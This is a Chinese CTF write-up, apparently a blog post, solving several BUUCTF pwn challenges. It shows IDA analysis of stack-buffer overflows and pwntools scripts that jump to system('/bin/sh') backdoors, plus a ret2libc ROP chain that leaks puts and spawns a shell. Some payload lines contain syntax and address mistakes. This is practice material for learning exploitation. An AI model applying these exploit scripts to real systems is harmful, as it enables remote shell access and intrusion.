BUUCTF pwn

test_your_nc

丢进ida可以看到只有一个后门函数

使用nc 网址 端口连接反弹shell

或者使用pwntools连接

from pwn import *
p=remote('网址',端口)
p.interactive()

rip

一、载入ida

载入ida可以看到主要有两个函数,main()和fun()

使用f5产生类C代码

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [rsp+1h] [rbp-Fh]
  puts("please input");
  gets(&s, argv);
  puts(&s);
  puts("ok,bye!!!");
  return 0;
}
int fun()
{
  return system("/bin/sh");
}

gets函数把输入放入缓存区,没有边界控制,可以造成缓冲区溢出。

所以本题就是利用栈溢出,构造足够长的串覆盖retn地址,使其跳转到fun函数,执行下方部分即可

000000000040118A                 lea     rdi, command    ; "/bin/sh"
0000000000401191                 call    _system

查看栈可以知道s距栈底为F,从f5的类C代码中也可以看到[rbp-Fh]即离栈底为F

所以F+一个寄存器(rbp)(64位一个寄存器就是8个字节)的覆盖后就是retn的地址

最终使用pwntools攻击脚本如下:

from pwn import *
con=remote("网址",端口)
payload='a'*0xFh+p64(0xdeadbeef)+p64(0x40118A)
con.sendline(payload)
con.interactive()

warmup_csaw_2016

一、载入ida

可以看到和上一题一样,还是一个主函数一个后门函数,参数覆盖retn即可

可以看到get对应的缓冲区为40h,后门函数关键地址400611,所以使用pwntools的攻击脚本如下:

from pwn import *
con=remote("网址",端口)
payload='a'*0x40h+p64(0xdeadbeef)+p64(0x40118A)
con.sendline(payload)
con.interactive()

pwn1_sctf_2016

丢进ida可以看到有两个关键函数vuln和get_flag,其中get_flag是预留的后门函数

.text:08048F13                 mov     dword ptr [esp], offset command ; "cat flag.txt"
.text:08048F1A                 call    _system

f5反汇编查看函数vuln,发现很多C++std::string类的函数,由于C++基础有限,查阅了一些资料后,结合猜测,可能的作用表示在图中。

可能反汇编的参数编号不同,跟进到replace函数看一下,就会把replace的参数调整过来。

所以从分析来看,这是用fgets输入到参数s中,s到栈底为3C即60,但是fgets只允许输入32,直接栈溢出办不到。再看之后的函数,总的功能就是把输入的I全部换成you。这样最大输入到96,可以溢出,最后使用pwntools的攻击脚本如下:

from pwn import *
con=remote("网址",端口)
payload='I'*20+p32(0xdeadbeef)+p32(0x08048F13)
con.sendline(payload)
con.interactive()

ciscn_2019_n_1

丢进ida反汇编可以看到func函数的逻辑如下:

可以看到逻辑是输入到v1,并让v2=11.28125即可,还是栈溢出逻辑,v1到栈底30h即48,v2到栈底4,至于11.28125在ida里对应部分可以看到整型对应的数字是41348000h,所以攻击脚本如下:

from pwn import *
con=remote("网址",端口)
payload='a'*44+p64(0x41348000)
con.sendline(payload)
con.interactive()

ciscn_2019_c_1

丢进ida,好像没有后门函数,搜索一下,确实没有。

可以看到主要起作用的函数是main()和encrypt(),流程为main()中进行选择,其中只有1,encrypt可以用。

int encrypt()
{
  size_t v0; // rbx
  char s[48]; // [rsp+0h] [rbp-50h]
  __int16 v3; // [rsp+30h] [rbp-20h]

  memset(s, 0, sizeof(s));
  v3 = 0;
  puts("Input your Plaintext to be encrypted");
  gets(s);
  while ( 1 )
  {
    v0 = (unsigned int)x;
    if ( v0 >= strlen(s) )
      break;
    if ( s[x] <= 96 || s[x] > 122 )
    {
      if ( s[x] <= 64 || s[x] > 90 )
      {
        if ( s[x] > 47 && s[x] <= 57 )
          s[x] ^= 0xFu;
      }
      else
      {
        s[x] ^= 0xEu;
      }
    }
    else
    {
      s[x] ^= 0xDu;
    }
    ++x;
  }
  puts("Ciphertext");
  return puts(s);
}

可以看到其中有gets()存在栈溢出漏洞,又有puts函数可以利用got表泄露来查找libc的版本,进而从libc中查找system()和'/bin/sh'字符串使用。

可以看到有加密过程,但是测试发现x不大于48,所以不会影响到payload内容。

先构造payload如下

payload='a'*0x50+p64(0xdeadbeef)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(encrypt_addr)

pop_rdi为通用gadget

pop rdi
ret

puts_got为got表puts项内容,即puts地址。puts_plt为plt表puts项内容,此处相当于调用puts().

最后返回encrypt函数进行第二次栈溢出以执行system('/bin/sh')

第二次payload

payload='a'*0x50+p64(0xdeadbeef)+p64(pop_rdi)+p64(str_bin_sh)+p64(system_addr)

最终的脚本如下

from pwn import *
from LibcSearcher import *
p=process('./ciscn_2019_c_1')
elf=ELF('ciscn_2019_c_1')
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
pop_rdi=0x400c83
encrypt_addr=0x4009A0

payload='a'*0x50+p64(0xdeadbeef)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(encrypt_addr)
p.sendlineafter("Input your choice!\n","1")
p.sendlineafter("Input your Plaintext to be encrypted\n",payload)
p.recvuntil('\n')
p.recvline()
puts_addr = u64(p.recvuntil('\n', drop=True).ljust(8,'\x00'))

libc=LibcSearcher("puts",puts_addr)
libc_base=puts_addr-libc.dump("puts")
system_addr=libc_base+libc.dump("system")
str_bin_sh=libc_base+libc.dump("str_bin_sh")

#ret_addr=0x4006b9如果没有栈对齐可以加ret
p.recvline()
payload='a'*0x50+p64(0xdeadbeef)+p64(pop_rdi)+p64(str_bin_sh)+p64(system_addr)
p.sendline(payload)
p.interactive()

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值